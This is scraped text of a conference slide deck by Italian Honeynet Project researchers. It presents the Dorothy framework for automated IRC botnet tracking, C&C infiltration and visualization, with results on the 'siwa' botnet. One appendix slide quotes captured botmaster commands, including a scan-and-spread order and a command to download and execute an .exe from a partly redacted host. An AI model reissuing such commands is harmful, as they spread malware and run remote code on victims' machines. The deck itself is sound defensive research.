an open botnet analysis framework for an open botnet
play

An Open Botnet Analysis Framework for An Open Botnet Analysis - PowerPoint PPT Presentation

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi Italian Chapter - The Honeynet Project marco cremonini


  1. An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi – Italian Chapter - The Honeynet Project marco cremonini – Dept. of Information Technology – Università di Miliano

  2.  Defining the problem : IRC botnets  Defining the goal to achieve  The proposed solution: The Dorothy Framework  The Realized proof of concept: honey-dorothy  Results  Case study: siwa botnet  Workplan  Conclusions

  3.  Botnets are considered one of the most dangerous threat ◦ Hard to keep pace with their evolutions ◦ Hard to protect against their attacks ◦ Hard to mitigate  Time between Command and Center (C&C) identification and botnet mitigation is tipically too long  Technical issues  Legal issues

  4.  Mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed ◦ Considering social context (legal, culture, etc) ◦ All the contermeasures provided by ISP/LEO (blacklisting, dns update,etc) are to be closely justified before its execution.

  5.  A mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed ◦ Considering social context (legal, economic, oprational, etc.) ◦ All contermeasures provided by ISP/LEO (blacklisting, DNS update,etc) must be clearly justified before their implementation Developing a framework that automatically provide all information needed by an ISP/LEO to activate a mitigation strategy

  6.  Automated framework for IRC botnet analysis ◦ Automatic Malware acquisition & analysis ◦ Automatic C&C IRC channel infiltration ◦ Automatic reporting activity status  Interactive graphic front-end  Real time information about monitored C&Cs ◦ Defenders can use these information to develop timely countermeasures to mitigate the risks  Customizable ◦ Defenders could be alerted when a botnet activity is detected in their network

  7.  Malware Collection Module  Virtual Honeypot Injection Module  Network Analysis Module  Data Extraction Module

  8.  Infiltration Module  Geolocation Module  Live Data Extraction Module  Data Visualization Module  Web Graphical User Interface

  9.  Proposed proof of concept  Developed using bash scripting language ◦ Fully compatible with POSIX systems ◦ Fully automatized  Developed to be modular ◦ Easy integration with other tools ◦ Customizable  90% of its components are open source  The Virualization Module has been developed on VMware  A migration to VirtualBox is ongoing

  10.  Low interaction honeypots ( nepenthes )  All honeypots upload their malwares to a central malware repository  Recently has been added the support to the Mwcollect Alliance repository  A malware analysis module (static/dynamic) integration is ongoing.

  11.  The virtualization enviroment has been developed on VMware enviroment  vmtools support the scripting implementation  The malware is executed on a virtual machine (Win XP SP2)  After three minutes the VM is reverted to its original snapshot

  12.  Inspect zombies network behavior during the three minutes of infected VM execution  The network traffic is sniffed by tcpdump tool  The output is stored into a dump file and sent to the next module

  13.  The goal of this module is to extract all relevant information about C&Cs  Extracted information are used for botnet classification ◦ C&C IP addresses ◦ C&C Satellites ◦ Hostname associated ◦ Hostname resolved by DNS servers

  14.  Infiltrate, Observe, Report  IRC-drone ◦ Full bash encoded ◦ Multichannel support ◦ Auto-respond to PING request ◦ The drone injects all the IRC commands extracted from the traffic generated by VM zombies as is.  Compatible to non IRC-compliant C&C  The connection toward the C&C is anonymized through the TOR network

  15.  All the data received and sent to C&Cs are logged into txt files  Instant notification by email when : ◦ Topic changement ◦ New command issued by bot master ◦ MODE option modification  A full module re-engineerization is ongoing ◦ Multiplatform ◦ Support for more onion networks

  16.  Geolocation information give an approximated geographical location of C&Cs ◦ Can be useful to consider the social contex  Useful for understanding which law officer notify  Provided by GeoCityLite  Free, good approximation

  17.  All log files generated by the IRC-drone are parsed ◦ Topics extraction ◦ Botmaster nickname/user host extraction ◦ Time delay calculation  Between each topic modification  Between each PING request (i.e. heartbeat )

  18. Parameter IPs Hosts Ports Zombies Malwares Chans Satellites ALL-Hosts Mail Addr

  19. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  20. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  21. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  22. “Overview first ,zoom and filter, then details on-demand ” B. Shneiderman. The eyes have it: A task by data type taxonomy for information visualizations.

  23.  Tested for a period of 27 days between January and March 2009  Two public IPs used for malware acquisition  3900 malware downloaded ◦ 304 unique ◦ 562,657 Mb downloaded  16 unique C&C classified ◦ 50 IRC channels monitored  8992 unique pubblic IPs indentified as zombies

  24.  Formed by 5 C&C servers ◦ 2 Located in China ◦ 2 Located in Canada ◦ 1 Located in Holland  7 Different channel names used ◦ #siwa was the most used  37 different C&C satellites providing botnet updating service through HTTP  42 host names related to siwa IP addresses  4346 unique IP addesses identified as zombies

  25.  Redesignment of the information flow management ◦ Information repository stored into relational database  Evaluate the developing of the core engine by means of other programming languages  Integration of a malware analysis module ◦ Dynamical & Static analysis  Virtual Honeypot: migration to VirtualBox

  26.  New module design and realization o A module for analyzing P2P botnets o A spam-trap implementation is ongoing  Development of a new IRC Drone ◦ Multiplatform, distribuited

  27.  Data visualization tuning ◦ Investigating new ways for representing botnet data  Developing a new web interface o More dynamic o Multi-user / user customizable  Improve the notification process o Mailing list o Web 2.0 comunication channels (twitter, feeds, blogs, ..)

  28.  The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter  Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework

  29.  The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter  Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework ….we hope to receive your supports too!

  30. The Italian Honeynet Chapter – www.honeynet.it marco riccardi – marco.riccardi [at] honeynet [dot] it marco cremonini – marco.cremonini [at] unimi [dot] it

  31.  Botmaster execution request ##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s  Zombies response 72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread 72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75- 4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :- 04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

  32. • Bar chars Number of DNS query executed by analized malware,grouped by C&C • Pie chars Number of DNS query

  33. • Topic activity • C&C heart-beat Time avarege between TOPIC Time avarege between two PING changement request

  34.  A full module re-engineering is ongoing  The new drone will be multiplatform  Anyone can support the infiltration process  It will support more than one onion network  It will send its log to a central log concentrator  Integrity and confidentiality have to managed accurately

Recommend


More recommend